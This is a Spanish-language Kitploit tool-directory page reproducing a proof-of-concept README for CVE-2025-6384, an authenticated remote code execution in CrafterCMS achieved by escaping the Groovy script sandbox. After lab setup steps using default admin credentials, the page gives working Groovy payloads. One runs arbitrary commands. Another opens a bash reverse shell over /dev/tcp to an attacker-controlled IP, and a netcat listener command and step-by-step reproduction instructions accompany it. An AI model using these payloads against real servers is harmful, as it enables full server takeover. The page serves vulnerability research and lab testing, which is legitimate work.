Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CrafterCMS-CVE-2025-6384 — Exploit PoC para un RCE autenticado en CrafterCMS mediante bypass del sandbox de Groovy (CVE-2025-6384) | Kitploit
Herramientas/GitHubGitHub/maestro-ant/craftercms-cve-2025-6384
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubmaestro-ant/craftercms-cve-2025-6384

CrafterCMS-CVE-2025-6384

Exploit PoC para un RCE autenticado en CrafterCMS mediante bypass del sandbox de Groovy (CVE-2025-6384)

Ver Repositorio
4hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CrafterCMS Autenticado RCE - Bypass de Sandbox de Groovy (CVE-2025-6384)

Una Prueba de Concepto para una vulnerabilidad de Ejecución Remota de Código autenticada en CrafterCMS.

Resumen de la Vulnerabilidad

Un usuario autenticado con privilegios de desarrollador puede eludir el sandbox de scripts Groovy en Crafter Studio para lograr Ejecución Remota de Código (RCE). El sandbox no logra bloquear la instanciación de un nuevo GroovyShell, que puede usarse para crear un nuevo entorno de ejecución sin restricciones.

  • Producto: CrafterCMS
  • Componente: Crafter Studio
  • Vulnerabilidad: RCE autenticada mediante Bypass de Sandbox de Groovy (CWE-913)
  • Impacto: Compromiso total del servidor

Configuración del Laboratorio / Despliegue

Puede desplegar rápidamente una instancia vulnerable de CrafterCMS para pruebas utilizando los archivos oficiales de Docker Compose.

  1. Clone el repositorio docker-compose de CrafterCMS:

    root@kitploit:~
git clone https://github.com/craftercms/docker-compose.git
  • Navegue al directorio del entorno de creación:

    root@kitploit:~
    cd docker-compose/authoring
    
  • Inicie los contenedores. Esto descargará las imágenes necesarias e iniciará el stack de CrafterCMS.

    root@kitploit:~
    docker-compose up
    

    (Nota: Puede ser necesario sudo dependiendo de su instalación de Docker.)

  • Espere a que los servicios se inicialicen completamente. Puede acceder a Crafter Studio en http://localhost:8080/studio.

    • Nombre de usuario predeterminado: admin
    • Contraseña predeterminada: admin
  • Prueba de Concepto (PoC)

    Si bien el sandbox bloquea correctamente los métodos de ejecución directa, permite el siguiente payload, que crea un nuevo shell de Groovy sin sandbox.

    root@kitploit:~
    // File: /scripts/interceptors/pwn.groovy
    
    def shell = new GroovyShell()
    def command = "id" // <-- Your command here
    def result = shell.evaluate("'''${command}'''.execute().text")
    
    // The output is printed to the server logs
    System.err.println("[RCE-PoC] " + result)
    

    Exploit RCE: Reverse Shell

    Este payload demuestra RCE completo estableciendo una reverse shell hacia una máquina controlada por el atacante.

    1. Iniciar un Listener

    En su máquina, inicie un listener (por ejemplo, usando netcat) para recibir la conexión entrante:

    root@kitploit:~
    nc -lvnp 4444
    

    2. Preparar el Payload

    Utilice el siguiente script Groovy como su payload. Recuerde reemplazar <YOUR_IP> y <YOUR_PORT> con la dirección IP y el puerto de su listener.

    root@kitploit:~
    // File: /scripts/interceptors/exploit.groovy
    
    def attacker_ip = "<YOUR_IP>"
    def attacker_port = "4444" // Or <YOUR_PORT>
    
    def cmd = "bash -i >& /dev/tcp/" + attacker_ip + "/" + attacker_port + " 0>&1"
    def shell = new GroovyShell()
    
    // Use triple quotes to handle the command string easily
    shell.evaluate("""
        new ProcessBuilder("/bin/bash", "-c", "${cmd}").start()
    """)
    
    System.err.println("Reverse shell payload executed.")
    

    Pasos para Reproducir

    1. Inicie sesión en Crafter Studio (http://localhost:8080/studio) con las credenciales predeterminadas (admin / admin).

    2. Navegue a Configuración del Sitio -> Scripts.

    3. Haga clic en Crear/Editar Script en la sección "Scripts Groovy".

      image
    4. Elija un tipo de script que se ejecutará, como Interceptor de Solicitudes.

    5. Pegue el payload de la PoC en el editor de scripts y guárdelo.

      image
    6. Active el script visitando cualquier página del sitio web (por ejemplo, http://localhost:8080).

    7. Verifique los registros de error estándar del servidor para ver la salida del comando.

      • Para la PoC, encuentre el ID de su contenedor y revise sus registros para la salida del comando:
      root@kitploit:~
      docker-compose logs -f crafter
      

      Salida esperada:

      root@kitploit:~
      GroovyShell: uid=1000(crafter) gid=1000(crafter) groups=1000(crafter)
      
      image
      • Para la Reverse Shell, verifique su listener de netcat. Debería recibir una sesión de shell desde el contenedor. image

    Descargo de Responsabilidad

    Este material es solo para fines educativos y de investigación. El autor no es responsable por ningún mal uso o daño causado por esta información.

    Descargar herramienta